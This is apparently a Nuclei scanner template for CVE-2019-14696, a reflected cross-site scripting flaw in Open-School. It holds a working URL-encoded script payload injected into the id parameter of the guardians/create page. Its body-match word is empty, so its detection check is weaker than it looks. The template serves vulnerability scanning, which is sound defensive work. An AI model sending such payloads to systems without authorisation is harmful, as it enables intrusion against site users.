id: CVE-2019-14696 info: name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting author: pikpikcu severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696 tags: cve,cve2019,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2019-14696 cwe-id: CWE-79 description: "Open-School 3.0, and Community Edition 2.3, allows XSS via the osv/index.php?r=students/guardians/create id parameter." requests: - method: GET path: - '{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - '' part: body